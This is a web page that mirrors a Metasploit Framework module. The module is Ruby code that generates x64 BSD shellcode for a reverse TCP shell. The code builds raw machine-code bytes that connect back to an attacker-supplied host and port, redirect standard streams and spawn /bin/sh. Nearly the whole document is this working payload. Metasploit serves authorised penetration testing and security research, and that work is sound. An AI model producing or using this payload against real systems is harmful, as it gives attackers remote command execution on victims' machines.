Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 98

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Bsd

11
  include Msf::Sessions::CommandShellOptions

12


13
  def initialize(info = {})

14
    super(

15
      merge_info(

16
        info,

17
        'Name' => 'BSD x64 Shell Reverse TCP',

18
        'Description' => 'Connect back to attacker and spawn a command shell',

19
        'Author' => [

20
          'nemo <nemo[at]felinemenace.org>',

21
          'joev' # copy pasta monkey

22
        ],

23
        'License' => MSF_LICENSE,

24
        'Platform' => 'bsd',

25
        'Arch' => ARCH_X64,

26
        'Handler' => Msf::Handler::ReverseTcp,

27
        'Session' => Msf::Sessions::CommandShellUnix

28
      )

29
    )

30


31
    # exec payload options

32


33
    register_options(

34
      [

35
        OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ]),

36
        Opt::LHOST,

37
        Opt::LPORT(4444)

38
      ]

39
    )

40
  end

41


42
  # build the shellcode payload dynamically based on the user-provided CMD

43
  def generate(_opts = {})

44
    lhost = datastore['LHOST'] || '127.0.0.1'

45


46
    # OptAddress allows either an IP or hostname, we only want IPv4

47
    if !Rex::Socket.is_ipv4?(lhost)

48
      raise ArgumentError, 'LHOST must be in IPv4 format.'

49
    end

50


51
    cmd = (datastore['CMD'] || '') + "\x00"

52
    port = [datastore['LPORT'].to_i].pack('n')

53
    ipaddr = [lhost.split('.').inject(0) { |t, v| (t << 8) + v.to_i }].pack('N')

54


55
    call = "\xe8" + [cmd.length].pack('V')

56
    "\x31\xc0" + # xor eax,eax

57
      "\x83\xc0\x61" +                             # add eax,0x61

58
      "\x6A\x02" +                                 # push byte +0x2

59
      "\x5F" +                                     # pop rdi

60
      "\x6A\x01" +                                 # push byte +0x1

61
      "\x5E" +                                     # pop rsi

62
      "\x48\x31\xD2" +                             # xor rdx,rdx

63
      "\x0F\x05" +                                 # loadall286

64
      "\x49\x89\xC4" +                             # mov r12,rax

65
      "\x48\x89\xC7" +                             # mov rdi,rax

66
      "\x31\xc0" +                                 # xor eax,eax

67
      "\x83\xc0\x62" +                             # add eax,0x62

68
      "\x48\x31\xF6" +                             # xor rsi,rsi

69
      "\x56" +                                     # push rsi

70
      "\x48\xBE\x00\x02" + port +                  # mov rsi,0x100007fb3150200

71
      ipaddr +

72
      "\x56" +                                     # push rsi

73
      "\x48\x89\xE6" +                             # mov rsi,rsp

74
      "\x6A\x10" +                                 # push byte +0x10

75
      "\x5A" +                                     # pop rdx

76
      "\x0F\x05" +                                 # loadall286

77
      "\x4C\x89\xE7" +                             # mov rdi,r12

78
      "\x6A\x03" +                                 # push byte +0x3

79
      "\x5E" +                                     # pop rsi

80
      "\x48\xFF\xCE" +                             # dec rsi

81
      "\x6A\x5A" +                                 # push +byte 0x5a

82
      "\x58" +                                     # pop rax

83
      "\x0F\x05" +                                 # loadall286

84
      "\x75\xF6" +                                 # jne -0x8

85
      "\x31\xc0" +                                 # xor eax,eax

86
      "\x83\xc0\x3B" +                             # add eax,0x3b

87
      call +                                       # call CMD.len

88
      cmd +                                        # CMD

89
      "\x48\x8B\x3C\x24" +                         # mov rdi,[rsp]

90
      "\x48\x31\xD2" +                             # xor rdx,rdx

91
      "\x52" +                                     # push rdx

92
      "\x57" +                                     # push rdi

93
      "\x48\x89\xE6" +                             # mov rsi,rsp

94
      "\x0F\x05"                                   # loadall286

95
  end

96
end

97


98